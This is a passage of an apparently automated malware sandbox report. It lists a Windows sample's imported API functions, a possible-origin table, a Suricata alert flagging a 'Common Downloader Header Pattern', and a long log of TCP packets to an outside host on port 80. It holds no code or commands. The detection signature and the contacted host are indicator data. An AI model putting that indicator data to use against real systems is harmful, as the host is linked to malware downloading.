FlushFileBuffers, FreeResource, GlobalFree, InterlockedExchange, GlobalUnlock, GlobalLock, GlobalAlloc, lstrlenA, WriteFile, GetCurrentThread, GetCurrentProcessId, CreateFileW, GetCurrentProcess, lstrcpyW, GetExitCodeProcess, WaitForSingleObject, CreateProcessW, GetModuleFileNameW, WideCharToMultiByte, lstrlenW, FreeLibrary, GetProcAddress, LoadLibraryW, GetCommandLineW, Sleep, CloseHandle, GetLastError, SetUnhandledExceptionFilter, MultiByteToWideChar, GetACP, GetPrivateProfileStringW, FindResourceW, LoadResource, LockResource, SizeofResource, GetCurrentThreadId, InitializeCriticalSection, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, GetVolumeInformationW, FindFirstFileW, GetPrivateProfileIntW, DuplicateHandle, InterlockedCompareExchange, GetTimeFormatA, GetDateFormatA
                              USER32.dllReuseDDElParam, UnpackDDElParam, CopyIcon, CharUpperBuffW, PostThreadMessageW, DefFrameProcW, DefMDIChildProcW, DrawMenuBar, TranslateMDISysAccel, CreateMenu, IsClipboardFormatAvailable, GetUpdateRect, GetDoubleClickTime, IsCharLowerW, GetKeyNameTextW, MapVirtualKeyExW, SubtractRect, DestroyCursor, GetWindowRgn, InsertMenuItemW, TranslateAcceleratorW, FrameRect, RegisterClipboardFormatW, EmptyClipboard, CloseClipboard, SetClipboardData, OpenClipboard, LoadImageW, GetIconInfo, HideCaret, InvertRect, LockWindowUpdate, BringWindowToTop, SetCursorPos, CreateAcceleratorTableW, LoadAcceleratorsW, GetKeyboardState, GetKeyboardLayout, MapVirtualKeyW, ToUnicodeEx, DrawFocusRect, DrawFrameControl, DrawEdge, DrawIconEx, SetClassLongW, DestroyAcceleratorTable, SetParent, DestroyIcon, GetNextDlgGroupItem, InvalidateRgn, SetRect, CopyAcceleratorTableW, CharNextW, UnregisterClassW, WaitMessage, CopyImage, GetMenuDefaultItem, SetMenuDefaultItem, IsMenu, MonitorFromPoint, UpdateLayeredWindow, EnableScrollBar, UnionRect, IsRectEmpty, CharUpperW, IsZoomed, GetAsyncKeyState, NotifyWinEvent, MessageBeep, ReleaseCapture, SetCapture, KillTimer, SetTimer, SetWindowRgn, LoadMenuW, DeleteMenu, OffsetRect, IntersectRect, RealChildWindowFromPoint, SetLayeredWindowAttributes, EnumDisplayMonitors, SetRectEmpty, LoadCursorW, GetSysColorBrush, WindowFromPoint, DestroyMenu, GetMenuItemInfoW, InflateRect, ShowOwnedPopups, SetCursor, GetMessageW, TranslateMessage, SetWindowContextHelpId, MapDialogRect, PostQuitMessage, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, ModifyMenuW, EnableMenuItem, CheckMenuItem, SendDlgItemMessageA, WinHelpW, IsChild, GetCapture, GetClassLongW, SetPropW, GetPropW, RemovePropW, GetForegroundWindow, DispatchMessageW, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, GetMessageTime, GetMessagePos, PeekMessageW, MonitorFromWindow, GetMonitorInfoW, MapWindowPoints, ScrollWindow, TrackPopupMenu, GetKeyState, SetMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, ShowScrollBar, RedrawWindow, IsWindowVisible, ValidateRect, CreateWindowExW, GetClassInfoExW, RegisterClassW, AdjustWindowRectEx, EqualRect, DeferWindowPos, GetScrollInfo, SetScrollInfo, SetWindowPlacement, GetWindowPlacement, DefWindowProcW, GetMenu, CopyRect, GetWindowTextLengthW, GetWindowTextW, SetFocus, MoveWindow, GetDlgCtrlID, SetWindowTextW, IsDialogMessageW, SetDlgItemTextW, SendDlgItemMessageW, CheckDlgButton, GetWindow, SetWindowsHookExW, UnhookWindowsHookEx, CallNextHookEx, GetFocus, GetSysColor, EndPaint, BeginPaint, GetWindowDC, ClientToScreen, ScreenToClient, GrayStringW, DrawTextExW, DrawTextW, TabbedTextOutW, GetWindowThreadProcessId, GetLastActivePopup, MessageBoxW, GetDesktopWindow, GetActiveWindow, CreateDialogIndirectParamW, DestroyWindow, IsWindow, GetDlgItem, IsWindowEnabled, GetNextDlgTabItem, EndDialog, GetClassNameW, InvalidateRect, UpdateWindow, FillRect, DrawStateW, GetMenuState, GetMenuStringW, GetMenuItemID, InsertMenuW, GetMenuItemCount, GetSubMenu, RemoveMenu, MessageBoxA, GetProcessWindowStation, GetUserObjectInformationW, LoadBitmapW, SystemParametersInfoW, AdjustWindowRect, PtInRect, ReleaseDC, GetWindowRect, GetDC, GetCursorPos, CreatePopupMenu, SetActiveWindow, SetForegroundWindow, SetWindowPos, ShowWindow, RegisterWindowMessageW, GetParent, DrawIcon, GetClientRect, GetSystemMetrics, IsIconic, SetWindowLongW, GetWindowLongW, SendMessageW, AppendMenuW, GetSystemMenu, LoadIconW, PostMessageW, FindWindowW, GetClassInfoW, EnableWindow, CallWindowProcW
                              GDI32.dllSetLayout, GetLayout, SelectClipRgn, SetTextAlign, CreateFontIndirectW, GetTextExtentPoint32W, CreateDIBitmap, CreateRectRgnIndirect, GetTextMetricsW, EnumFontFamiliesW, GetTextCharsetInfo, GetMapMode, PatBlt, DPtoLP, CreateRoundRectRgn, GetBkColor, GetTextColor, GetRgnBox, CreatePolygonRgn, CreateEllipticRgn, Polyline, Ellipse, MoveToEx, CreatePalette, GetPaletteEntries, GetNearestPaletteIndex, RealizePalette, GetSystemPaletteEntries, OffsetRgn, SetPixel, Rectangle, EnumFontFamiliesExW, SetPaletteEntries, LPtoDP, GetWindowOrgEx, GetViewportOrgEx, PtInRegion, FillRgn, FrameRgn, GetBoundsRect, SelectPalette, GetTextFaceW, SetPixelV, CreateBitmap, CreatePatternBrush, Polygon, LineTo, ExtSelectClipRgn, IntersectClipRect, ExcludeClipRect, GetClipBox, SetMapMode, SetTextColor, SetROP2, SetPolyFillMode, SetBkMode, SetBkColor, RestoreDC, SaveDC, GetStockObject, CreateDCW, CopyMetaFileW, GetDeviceCaps, CombineRgn, SetRectRgn, CreateRectRgn, StretchBlt, CreateDIBSection, GetObjectW, SetDIBColorTable, DeleteDC, ScaleWindowExtEx, SetWindowExtEx, OffsetWindowOrgEx, SetWindowOrgEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, Escape, ExtTextOutW, TextOutW, RectVisible, PtVisible, GetPixel, BitBlt, DeleteObject, SelectObject, CreateCompatibleBitmap, CreateCompatibleDC, CreateHatchBrush, CreatePen, GetObjectType, ExtFloodFill, CreateSolidBrush, GetWindowExtEx, GetViewportExtEx
                              MSIMG32.dllTransparentBlt, AlphaBlend
                              COMDLG32.dllGetFileTitleW
                              WINSPOOL.DRVOpenPrinterW, ClosePrinter, DocumentPropertiesW
                              ADVAPI32.dllRegSetValueExW, ReportEventA, RegisterEventSourceA, CryptEnumProvidersA, CryptReleaseContext, CryptDestroyKey, CryptGetProvParam, CryptAcquireContextA, CryptGetUserKey, CryptExportKey, CryptDestroyHash, RegEnumKeyExW, RegEnumValueW, RegQueryValueW, RegEnumKeyW, RegDeleteKeyW, RegDeleteValueW, DeregisterEventSource, RegCreateKeyExW, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, CryptDecrypt, CryptCreateHash, CryptSetHashParam, CryptSignHashA
                              SHELL32.dllSHGetFileInfoW, ShellExecuteW, ShellExecuteExW, SHBrowseForFolderW, DragQueryFileW, DragFinish, SHAppBarMessage, SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHGetDesktopFolder, Shell_NotifyIconW, ShellExecuteA, CommandLineToArgvW
                              COMCTL32.dllInitCommonControlsEx, _TrackMouseEvent, ImageList_GetIconSize
                              SHLWAPI.dllPathFindExtensionW, PathFindFileNameW, PathIsUNCW, PathRemoveFileSpecW, PathStripToRootW
                              ole32.dllOleCreateMenuDescriptor, OleInitialize, StgOpenStorageOnILockBytes, StgCreateDocfileOnILockBytes, OleDestroyMenuDescriptor, OleTranslateAccelerator, IsAccelerator, OleLockRunning, OleGetClipboard, RegisterDragDrop, CoLockObjectExternal, RevokeDragDrop, CoRevokeClassObject, CoRegisterMessageFilter, ReleaseStgMedium, CoTaskMemAlloc, OleDuplicateData, CoCreateGuid, CLSIDFromProgID, CLSIDFromString, CoCreateInstance, CoDisconnectObject, CoInitialize, CoUninitialize, CoInitializeEx, CoFreeUnusedLibraries, OleUninitialize, DoDragDrop, OleFlushClipboard, OleIsCurrentClipboard, CreateILockBytesOnHGlobal, CoTaskMemFree, CreateStreamOnHGlobal, CoGetClassObject
                              OLEAUT32.dllVariantCopy, VariantClear, OleCreateFontIndirect, LoadTypeLib, VarBstrFromDate, SysStringLen, SystemTimeToVariantTime, VariantTimeToSystemTime, SafeArrayDestroy, VariantChangeType, SysFreeString, SysAllocStringLen, VariantInit, SysAllocString, DispCallFunc, LoadRegTypeLib, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetElemsize, SafeArrayCreate
                              oledlg.dllOleUIBusyW
                              gdiplus.dllGdipSetInterpolationMode, GdipCreateBitmapFromHBITMAP, GdipDrawImageRectRect, GdipDrawImageRect, GdipCloneBitmapAreaI, GdipCreateBitmapFromFile, GdipCreateBitmapFromStream, GdipGetImagePixelFormat, GdipGetImagePaletteSize, GdipGetImagePalette, GdipBitmapLockBits, GdipBitmapUnlockBits, GdipCreateBitmapFromScan0, GdipGetImageGraphicsContext, GdipDrawImageI, GdipReleaseDC, GdipDrawString, GdipSetTextRenderingHint, GdipCloneBrush, GdipDeleteBrush, GdipCreateSolidFill, GdipSetStringFormatLineAlign, GdipSetStringFormatAlign, GdipDeleteStringFormat, GdipCreateStringFormat, GdipDeleteFont, GdipCreateFontFamilyFromName, GdipDeleteFontFamily, GdipGetGenericFontFamilySansSerif, GdipCreateFont, GdipDrawImageRectI, GdipSetSmoothingMode, GdipDeleteGraphics, GdipCreateFromHDC, GdipGetImageHeight, GdipGetImageWidth, GdipDisposeImage, GdipCloneImage, GdipAlloc, GdipFree, GdiplusShutdown, GdiplusStartup, GdipLoadImageFromFile
                              dbghelp.dllSymFunctionTableAccess, SymGetModuleBase, StackWalk, MiniDumpWriteDump, SymSetOptions, SymInitialize
                              OLEACC.dllAccessibleObjectFromWindow, CreateStdAccessibleObject, LresultFromObject
                              IMM32.dllImmGetOpenStatus, ImmReleaseContext, ImmGetContext
                              WINMM.dllPlaySoundW

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              ChineseChina
                              EnglishUnited States

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                              2024-08-27T09:48:51.304790+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa36138280192.168.2.5188.114.97.3

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Aug 27, 2024 09:48:50.473522902 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:50.479562044 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:50.479636908 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:50.479897022 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:50.484687090 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.304615974 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.304636002 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.304642916 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.304771900 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.304783106 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.304791927 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.304790020 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.304805040 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.304836988 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.304861069 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.304862976 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.304873943 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.304883003 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.304918051 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.304939032 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.311599970 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.311671019 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.311680079 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.311681986 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.311693907 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.311712980 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.311742067 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.393687010 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.393711090 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.393728018 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.393734932 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.393743038 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.393877029 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.393889904 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.393951893 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.393964052 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.394021988 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.394027948 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.394035101 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.394104004 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.395061970 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.395081997 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.395092964 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.395104885 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.395153999 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.395215034 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.395559072 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.395570040 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.395581007 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.395641088 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.395656109 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.395667076 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.395721912 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.396511078 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.396544933 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.396557093 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.396590948 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.396652937 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.396687031 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.396769047 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.432912111 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.432928085 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.432940006 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.433046103 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.481192112 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.481220007 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.481230974 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.481244087 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.481254101 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.481265068 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.481267929 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.481278896 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.481296062 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.481332064 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.481734037 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.481772900 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.481781960 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.481791973 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.481817007 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.481832027 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.481893063 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.481904030 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.481914043 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.481937885 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.481964111 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.482547045 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.482567072 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.482577085 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.482599974 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.482621908 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.482672930 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.482683897 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.482728004 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.482748985 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.483158112 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.483206034 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.483230114 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.483243942 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.483279943 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.483305931 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.483316898 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.483321905 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.483649969 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.484080076 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.484122038 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.484134912 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.484147072 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.484159946 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.484177113 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.484201908 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.484214067 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.484225035 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.484244108 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.484266043 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.485043049 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.485066891 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.485169888 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.485182047 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.485199928 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.485236883 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.485311031 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.485323906 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.485357046 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.486166954 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.486210108 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.486228943 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.486270905 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.486296892 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.486309052 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.486337900 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.486351013 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.486397982 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.486409903 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.486444950 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.487123013 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.487166882 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.487180948 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.487220049 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.520493031 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.520505905 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.520520926 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.520560980 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.520601034 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.520623922 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.520637035 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.520668983 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.570168972 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.570185900 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.570203066 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.570213079 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.570224047 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.570234060 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.570250034 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.570324898 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.570451021 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.570508957 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.570538044 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.570549011 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.570574045 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.570664883 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.570696115 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.570707083 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.570717096 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.570729017 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.570764065 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.570813894 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.571305990 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.571360111 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.571371078 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.571386099 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.571448088 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.571459055 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.571471930 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.571472883 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.571485043 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.571568966 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.572213888 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.572223902 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.572237968 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.572288036 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.572314978 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.572325945 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.572335005 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.572340012 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.572349072 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.572429895 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.573045969 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.573122025 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.573153019 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.573164940 CEST8061382188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.573235989 CEST6138280192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.744530916 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.842966080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:51.843259096 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.843849897 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:51.852763891 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.314259052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.317295074 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.322196960 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.420311928 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.420326948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.420336962 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.420377970 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.420387983 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.420393944 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.420427084 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.420439005 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.420561075 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.420572996 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.420572996 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.420634985 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.421256065 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.425498009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.425510883 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.425592899 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.508781910 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.508824110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.508833885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.508945942 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.508958101 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.508968115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.508979082 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.508991957 CEST6138380192.168.2.5188.114.97.3
